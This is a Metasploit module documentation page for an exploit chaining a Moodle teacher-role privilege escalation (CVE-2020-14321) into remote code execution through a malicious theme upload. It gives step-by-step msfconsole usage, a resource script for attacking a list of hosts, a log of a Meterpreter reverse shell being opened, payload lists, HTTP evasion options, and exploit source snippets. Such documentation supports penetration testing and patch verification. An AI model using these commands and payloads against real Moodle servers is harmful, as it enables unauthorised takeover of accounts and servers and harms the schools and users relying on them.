Moodle Teacher Enrollment Privilege Escalation to RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Moodle Teacher Enrollment Privilege Escalation to RCE
Module: exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
Source code: modules/exploits/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.rb
Disclosure date: 2020-07-20
Last modification time: 2021-10-11 16:23:09 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-14321

Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions allow for a teacher to exploit chain to RCE. A bug in the privileges system allows a teacher to add themselves as a manager to their own class. They can then add any other users, and thus look to add someone with manager privileges on the system (not just the class). After adding a system manager, a 'loginas' feature is used to access their account. Next the system is reconfigured to allow for all users to install an addon/plugin. Then a malicious theme is uploaded and creates an RCE. If all of that is a success, we revert permissions for managers to system default and remove our malicoius theme. Manual cleanup to remove students from the class is required. This module was tested against Moodle version 3.9

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • config-changes: Module modifies some configuration setting on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using moodle_teacher_enrollment_priv_esc_to_rce against a single host

Normally, you can use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce this way:

msf > use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
msf exploit(moodle_teacher_enrollment_priv_esc_to_rce) > show targets
    ... a list of targets ...
msf exploit(moodle_teacher_enrollment_priv_esc_to_rce) > set TARGET target-id
msf exploit(moodle_teacher_enrollment_priv_esc_to_rce) > show options
    ... show and set options ...
msf exploit(moodle_teacher_enrollment_priv_esc_to_rce) > exploit

Using moodle_teacher_enrollment_priv_esc_to_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your moodle_teacher_enrollment_priv_esc_to_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions allow for a teacher to exploit chain to RCE. A bug in the privileges system allows a teacher to add themselves as a manager to their own class. They can then add any other users, and thus look to add someone with manager privileges on the system (not just the class). After adding a system manager, a 'loginas' feature is used to access their account. Next the system is reconfigured to allow for all users to install an addon/plugin. Then a malicious theme is uploaded and creates an RCE.

If all of that is a success, we revert permissions for managers to system default and remove our malicoius theme. Manual cleanup to remove students from the class is required.

This module was tested against Moodle version 3.9

Install

Moodle provides a step by step guide to install their software. However you'll want to use 3.9.0 isntead of 3.11.0. here

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use exploits/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
  4. Do: set username [username]
  5. Do: set password [password]
  6. Do: run
  7. You should get a shell.

Options


MAXUSERS

The amount of users to add to the class in hopes of finding a manager. Defaults to 100.

Passowrd

Password of a teacher.

Username

Username of a teacher.

Scenarios


Moodle 3.9.0 on Ubuntu 20.04

resource (moodle_privesc.rb)> use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (moodle_privesc.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_privesc.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_privesc.rb)> set username teacher
username => teacher
resource (moodle_privesc.rb)> set password Teacherteacher1!
password => Teacherteacher1!
resource (moodle_privesc.rb)> set lhost eth0
lhost => eth0
resource (moodle_privesc.rb)> set MAXUSERS 10
MAXUSERS => 10
resource (moodle_privesc.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: teacher
[*] Retrieving user info
[+] User ID: 4
[+] Course ID: 2
[+] Sessionkey: R1lSAKDT73
[*] Retrieving course enrollment id
[+] Enrol ID: 1
[*] Attempting to enrolin in class as manager (priv esc)
[+] Successfully enrolled
[*] Attempting to find and add a manager to class
[*] Attempting user: 2
[+] Successfully enrolled
[*] Attempting user: 3
[+] Successfully enrolled
[*] Attempting user: 4
[+] Successfully enrolled
[*] Attempting user: 5
[+] Successfully enrolled
[*] Attempting user: 6
[-] Unsuccessful
[*] Attempting user: 7
[-] Unsuccessful
[*] Attempting user: 8
[-] Unsuccessful
[*] Attempting user: 9
[-] Unsuccessful
[*] Retrieving course context id
[+] Context ID: 28
[+] Found manager user IDs: ["5", "4"]
[*] Attempting loginas for user id: 5
[*] Logged in as: manager manager
[+] Looks like a potentially good manager account!
[*] Attempting via new session key: gUocfkXDpe
[*] Checking if permissions were set successfully
[+] Manager roll full permissioned, attempting to upload shell
[*] Creating plugin named: mbdzduot with poisoned header: PIYB
[*] Uploading addon
[+] Upload Successful.  Integrating addon
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56418) at 2021-09-04 13:21:51 -0400
[*] Uninstalling plugin
[*] Resetting permissions

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)

Go back to menu.

Msfconsole Usage


Here is how the multi/http/moodle_teacher_enrollment_priv_esc_to_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show info

       Name: Moodle Teacher Enrollment Privilege Escalation to RCE
     Module: exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2020-07-20

Provided by:
  HoangKien1020
  lanz
  h00die

Module side effects:
 config-changes
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  MAXUSERS   100              yes       Maximum amount of users to add to course looking for admin
  PASSWORD                    yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the moodle application
  USERNAME                    yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 6070
  Avoid: 1 characters

Description:
  Moodle version 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and 
  earlier unsupported versions allow for a teacher to exploit chain to 
  RCE. A bug in the privileges system allows a teacher to add 
  themselves as a manager to their own class. They can then add any 
  other users, and thus look to add someone with manager privileges on 
  the system (not just the class). After adding a system manager, a 
  'loginas' feature is used to access their account. Next the system 
  is reconfigured to allow for all users to install an addon/plugin. 
  Then a malicious theme is uploaded and creates an RCE. If all of 
  that is a success, we revert permissions for managers to system 
  default and remove our malicoius theme. Manual cleanup to remove 
  students from the class is required. This module was tested against 
  Moodle version 3.9

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-14321
  https://moodle.org/mod/forum/discuss.php?d=407393
  https://github.com/HoangKien1020/CVE-2020-14321
  https://www.exploit-db.com/exploits/50180

Module Options


This is a complete list of options available in the multi/http/moodle_teacher_enrollment_priv_esc_to_rce exploit:

msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show options

Module options (exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MAXUSERS   100              yes       Maximum amount of users to add to course looking for admin
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the moodle application
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/http/moodle_teacher_enrollment_priv_esc_to_rce exploit:

msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show advanced

Module advanced options (exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   MOODLECHECK             true                                                yes       Check if the website is a valid Moodle install
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted:
                                                                                          Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/moodle_teacher_enrollment_priv_esc_to_rce module can exploit:

msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/moodle_teacher_enrollment_priv_esc_to_rce exploit:

msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   18  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/moodle_teacher_enrollment_priv_esc_to_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/moodle_teacher_enrollment_priv_esc_to_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error retrieving user id


Here is a relevant code snippet related to the "Error retrieving user id" error message:

72:	    print_status('Retrieving user info')
73:	    res = send_request_cgi({
74:	      'uri' => normalize_uri(target_uri.path, 'user', 'profile.php'),
75:	      'keep_cookies' => true
76:	    })
77:	    fail_with(Failure::Unreachable, 'Error retrieving user id') unless res
78:	    # user id
79:	    res.body =~ /id=(\d)/
80:	    userid = Regexp.last_match(1)
81:	    # course id
82:	    res.body =~ /course=(\d)/

Error retrieving settings


Here is a relevant code snippet related to the "Error retrieving settings" error message:

95:	          'roleid' => '1',
96:	          'contextid' => context_id
97:	        },
98:	      'keep_cookies' => true
99:	    })
100:	    fail_with(Failure::Unreachable, 'Error retrieving settings') unless res
101:	    return res.body.scan(/id=(\d)&amp;course/).flatten
102:	  end
103:	
104:	  def manager_default_permissions(sess_key)
105:	    # reset Role archetype, Context types where this role may be assigned, and Permissions.

Error changing manager role permissions


Here is a relevant code snippet related to the "Error changing manager role permissions" error message:

121:	      'uri' => normalize_uri(target_uri.path, 'admin', 'roles', 'define.php?roleid=1&action=edit'),
122:	      'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/x-www-form-urlencoded' },
123:	      'cookie' => "#{cookie_jar.cookies[0].name}=#{cookie_jar.cookies[0].value}",
124:	      'data' => permissions
125:	    })
126:	    fail_with(Failure::Unreachable, 'Error changing manager role permissions') unless res
127:	  end
128:	
129:	  # copy from moodle_admin_shell_upload
130:	  def create_addon_file
131:	    # There are syntax errors in creating zip file. So the payload was sent as base64.

No web server or moodle instance found


Here is a relevant code snippet related to the "No web server or moodle instance found" error message:

154:	      'raw_headers' => "#{header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
155:	    })
156:	  end
157:	
158:	  def check
159:	    return CheckCode::Unknown('No web server or moodle instance found') unless moodle_and_online?
160:	
161:	    v = moodle_version
162:	    return CheckCode::Detected('Unable to determine moodle version') if v.nil?
163:	
164:	    # https://moodle.org/mod/forum/discuss.php?d=407393

Unable to determine moodle version


Here is a relevant code snippet related to the "Unable to determine moodle version" error message:

157:	
158:	  def check
159:	    return CheckCode::Unknown('No web server or moodle instance found') unless moodle_and_online?
160:	
161:	    v = moodle_version
162:	    return CheckCode::Detected('Unable to determine moodle version') if v.nil?
163:	
164:	    # https://moodle.org/mod/forum/discuss.php?d=407393
165:	    v = Rex::Version.new(v)
166:	    if v.between?(Rex::Version.new('3.9'), Rex::Version.new('3.9.1')) ||
167:	       v.between?(Rex::Version.new('3.8'), Rex::Version.new('3.8.4')) ||

Exploitable Moodle version <V> detected


Here is a relevant code snippet related to the "Exploitable Moodle version <V> detected" error message:

166:	    if v.between?(Rex::Version.new('3.9'), Rex::Version.new('3.9.1')) ||
167:	       v.between?(Rex::Version.new('3.8'), Rex::Version.new('3.8.4')) ||
168:	       v.between?(Rex::Version.new('3.7'), Rex::Version.new('3.7.7')) ||
169:	       v.between?(Rex::Version.new('3.5'), Rex::Version.new('3.5.13')) ||
170:	       v.between?(Rex::Version.new('3'), Rex::Version.new('3.5'))
171:	      return CheckCode::Appears("Exploitable Moodle version #{v} detected")
172:	    end
173:	
174:	    CheckCode::Safe("Non-exploitable Moodle version #{v} detected")
175:	  end
176:	

Non-exploitable Moodle version <V> detected


Here is a relevant code snippet related to the "Non-exploitable Moodle version <V> detected" error message:

169:	       v.between?(Rex::Version.new('3.5'), Rex::Version.new('3.5.13')) ||
170:	       v.between?(Rex::Version.new('3'), Rex::Version.new('3.5'))
171:	      return CheckCode::Appears("Exploitable Moodle version #{v} detected")
172:	    end
173:	
174:	    CheckCode::Safe("Non-exploitable Moodle version #{v} detected")
175:	  end
176:	
177:	  def exploit
178:	    v = moodle_version
179:	    return CheckCode::Detected('Unable to determine moodle version') if v.nil?

Unable to determine moodle version


Here is a relevant code snippet related to the "Unable to determine moodle version" error message:

174:	    CheckCode::Safe("Non-exploitable Moodle version #{v} detected")
175:	  end
176:	
177:	  def exploit
178:	    v = moodle_version
179:	    return CheckCode::Detected('Unable to determine moodle version') if v.nil?
180:	
181:	    version = Rex::Version.new(v)
182:	
183:	    print_status("Authenticating as user: #{datastore['USERNAME']}")
184:	    cookies = moodle_login(datastore['USERNAME'], datastore['PASSWORD'])

Unable to login. Check credentials


Here is a relevant code snippet related to the "Unable to login. Check credentials" error message:

180:	
181:	    version = Rex::Version.new(v)
182:	
183:	    print_status("Authenticating as user: #{datastore['USERNAME']}")
184:	    cookies = moodle_login(datastore['USERNAME'], datastore['PASSWORD'])
185:	    fail_with(Failure::NoAccess, 'Unable to login. Check credentials') if cookies.nil? || cookies.empty?
186:	    cookies.each do |cookie|
187:	      cookie_jar.add(cookie)
188:	    end
189:	
190:	    userid, courseid, sesskey = get_user_info

Unable to enrol in course as manager


Here is a relevant code snippet related to the "Unable to enrol in course as manager" error message:

194:	    print_status('Retrieving course enrollment id')
195:	    enrolid = get_course_enrol_id(courseid)
196:	    print_good("Enrol ID: #{enrolid}")
197:	    print_status('Attempting to enrolin in class as manager (priv esc)')
198:	    success = enrol(userid, courseid, enrolid, sesskey)
199:	    fail_with(Failure::NoAccess, 'Unable to enrol in course as manager') unless success
200:	    print_good('Successfully enrolled')
201:	    print_status('Attempting to find and add a manager to class')
202:	    Array(2...datastore['MAXUSERS']).each do |id|
203:	      next if id == userid
204:	

Unsuccessful


Here is a relevant code snippet related to the "Unsuccessful" error message:

205:	      print_status("Attempting user: #{id}")
206:	      success = enrol(id, courseid, enrolid, sesskey, '5')
207:	      if success
208:	        print_good('Successfully enrolled')
209:	      else
210:	        print_bad('Unsuccessful')
211:	      end
212:	    end
213:	    print_status('Retrieving course context id')
214:	    contextid = get_course_context_id(courseid)
215:	    print_good("Context ID: #{contextid}")

Error retrieving settings


Here is a relevant code snippet related to the "Error retrieving settings" error message:

233:	      set_manager_permissions(manager_all_permissions(new_sesskey))
234:	      print_status('Checking if permissions were set successfully')
235:	      res = send_request_cgi({
236:	        'uri' => normalize_uri(target_uri.path, 'admin', 'search.php')
237:	      })
238:	      fail_with(Failure::Unreachable, 'Error retrieving settings') unless res
239:	      next unless res.body.include?('Install plugins')
240:	
241:	      print_good('Manager roll full permissioned, attempting to upload shell')
242:	      success = true
243:	      addon_content, header, addon_name = create_addon_file

Unable to upload addon. Make sure you are able to upload plugins with current permissions


Here is a relevant code snippet related to the "Unable to upload addon. Make sure you are able to upload plugins with current permissions" error message:

241:	      print_good('Manager roll full permissioned, attempting to upload shell')
242:	      success = true
243:	      addon_content, header, addon_name = create_addon_file
244:	      print_status('Uploading addon')
245:	      file_id, addon_sesskey = upload_addon(addon_name, version, addon_content)
246:	      fail_with(Failure::NoAccess, 'Unable to upload addon.  Make sure you are able to upload plugins with current permissions') if file_id.nil?
247:	      print_good('Upload Successful.  Integrating addon')
248:	      ret = plugin_integration(addon_sesskey, file_id, addon_name)
249:	      if ret.nil?
250:	        fail_with(Failure::NoAccess, 'Install not successful')
251:	      end

Install not successful


Here is a relevant code snippet related to the "Install not successful" error message:

245:	      file_id, addon_sesskey = upload_addon(addon_name, version, addon_content)
246:	      fail_with(Failure::NoAccess, 'Unable to upload addon.  Make sure you are able to upload plugins with current permissions') if file_id.nil?
247:	      print_good('Upload Successful.  Integrating addon')
248:	      ret = plugin_integration(addon_sesskey, file_id, addon_name)
249:	      if ret.nil?
250:	        fail_with(Failure::NoAccess, 'Install not successful')
251:	      end
252:	      exec_code(addon_name, header)
253:	      print_status('Uninstalling plugin')
254:	      remove_plugin("theme_#{addon_name}", version, addon_sesskey)
255:	      print_status('Resetting permissions')

Failed to upgrade permissions on manager roll


Here is a relevant code snippet related to the "Failed to upgrade permissions on manager roll" error message:

254:	      remove_plugin("theme_#{addon_name}", version, addon_sesskey)
255:	      print_status('Resetting permissions')
256:	      set_manager_permissions(manager_default_permissions(sesskey))
257:	      break
258:	    end
259:	    print_bad('Failed to upgrade permissions on manager roll') unless success
260:	  end
261:	
262:	  def on_new_session(_)
263:	    print_good('You will need to change directories on meterpreter to get full functionality. Try: cd /tmp')
264:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • HoangKien1020
  • lanz
  • h00die

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.